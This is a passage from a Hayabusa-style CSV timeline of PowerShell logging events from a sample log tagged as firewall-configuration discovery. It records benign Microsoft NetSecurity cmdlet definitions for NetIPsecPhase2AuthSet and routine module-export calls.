IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] 
[ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] $",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.957 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"{NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, 
$false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings 
= 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value 
= $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; 
value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
name=""Function""; value=""New-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 
+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value 
= ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; 
